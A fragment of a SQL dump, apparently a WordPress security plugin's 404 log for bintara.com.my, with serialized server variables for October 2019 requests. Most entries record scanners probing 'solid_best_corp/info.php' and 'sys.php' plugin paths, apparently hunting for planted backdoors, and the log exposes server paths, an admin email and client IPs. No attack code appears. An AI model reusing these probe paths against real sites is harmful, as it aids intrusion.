Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacNKvLBR6YFGUMa@gwhWAAAAIE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.164.206.34\";s:11:\"REMOTE_PORT\";s:5:\"20093\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XacNKvLBR6YFGUMa@gwhWAAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571228971.0663\";s:12:\"REQUEST_TIME\";s:10:\"1571228971\";}}','notice','2019-10-16 12:29:35','2019-10-16 12:29:31',35741216,37547104,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.164.206.34'),(28141,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/portal/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/portal/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacXyvLBR6YFGUMa@gwpKgAAAIY\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/portal/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacXyvLBR6YFGUMa@gwpKgAAAIY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.100.249.231\";s:11:\"REMOTE_PORT\";s:5:\"45720\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:51:\"/portal/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacXyvLBR6YFGUMa@gwpKgAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571231690.3962\";s:12:\"REQUEST_TIME\";s:10:\"1571231690\";}}','notice','2019-10-16 13:14:53','2019-10-16 13:14:50',35678816,37480632,'https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/info.php',1,0,'5.100.249.231'),(28142,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/portal/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:50:\"/portal/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacYM1VwATuNyQjXQnolvQAAAVI\";s:19:\"REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:50:\"/portal/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacYM1VwATuNyQjXQnolvQAAAVI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.100.249.231\";s:11:\"REMOTE_PORT\";s:5:\"55145\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:72:\"https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:50:\"/portal/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacYM1VwATuNyQjXQnolvQAAAVI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571231795.3365\";s:12:\"REQUEST_TIME\";s:10:\"1571231795\";}}','notice','2019-10-16 13:16:37','2019-10-16 13:16:35',35062032,36861992,'https://bintara.com.my/portal/wp-content/plugins/solid_best_corp/sys.php',1,0,'5.100.249.231'),(28143,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:52:\"/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacgA-LBR6YFGUMa@gwspgAAAIs\";s:19:\"REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:52:\"/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacgA-LBR6YFGUMa@gwspgAAAIs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"192.169.227.95\";s:11:\"REMOTE_PORT\";s:5:\"58918\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:74:\"https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:52:\"/oldsite/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacgA-LBR6YFGUMa@gwspgAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571233795.9267\";s:12:\"REQUEST_TIME\";s:10:\"1571233795\";}}','notice','2019-10-16 13:49:58','2019-10-16 13:49:56',35680472,37482072,'https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/info.php',1,0,'192.169.227.95'),(28144,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:51:\"/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:51:\"/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XacgN6581BjCPGmiPvMcAAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:73:\"https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:51:\"/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XacgN6581BjCPGmiPvMcAAAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"192.169.227.95\";s:11:\"REMOTE_PORT\";s:5:\"38048\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:73:\"https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:51:\"/oldsite/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XacgN6581BjCPGmiPvMcAAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571233847.9015\";s:12:\"REQUEST_TIME\";s:10:\"1571233847\";}}','notice','2019-10-16 13:50:49','2019-10-16 13:50:48',35059728,36866912,'https://bintara.com.my/oldsite/wp-content/plugins/solid_best_corp/sys.php',1,0,'192.169.227.95'),(28145,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/www/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/www/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/www/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xacg8K581BjCPGmiPvMcbAAAABY\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/www/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/www/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xacg8K581BjCPGmiPvMcbAAAABY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.32.168\";s:11:\"REMOTE_PORT\";s:5:\"50408\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/www/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:47:\"/www/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xacg8K581BjCPGmiPvMcbAAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571234032.3177\";s:12:\"REQUEST_TIME\";s:10:\"1571234032\";}}','notice','2019-10-16 13:53:54','2019-10-16 13:53:52',35058056,36855456,'https://bintara.com.my/www/wp-content/plugins/solid_best_corp/sys.php',1,0,'45.55.32.168'),(28146,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/www/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/www/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/www/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xacg8K581BjCPGmiPvMcawAAAA0\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/www/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/www/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xacg8K581BjCPGmiPvMcawAAAA0\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.32.168\";s:11:\"REMOTE_PORT\";s:5:\"50406\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/www/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:48:\"/www/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xacg8K581BjCPGmiPvMcawAAAA0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571234032.2618\";s:12:\"REQUEST_TIME\";s:10:\"1571234032\";}}','notice','2019-10-16 13:53:55','2019-10-16 13:53:52',35681776,37487248,'https://bintara.com.my/www/wp-content/plugins/solid_best_corp/info.php',1,0,'45.55.32.168'),(28147,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/temp.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/temp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/temp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xacuxa581BjCPGmiPvMngwAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/temp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/temp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xacuxa581BjCPGmiPvMngwAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"58670\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/temp.php\";s:10:\"SCRIPT_URL\";s:9:\"/temp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xacuxa581BjCPGmiPvMngwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571237573.735\";s:12:\"REQUEST_TIME\";s:10:\"1571237573\";}}','notice','2019-10-16 14:52:58','2019-10-16 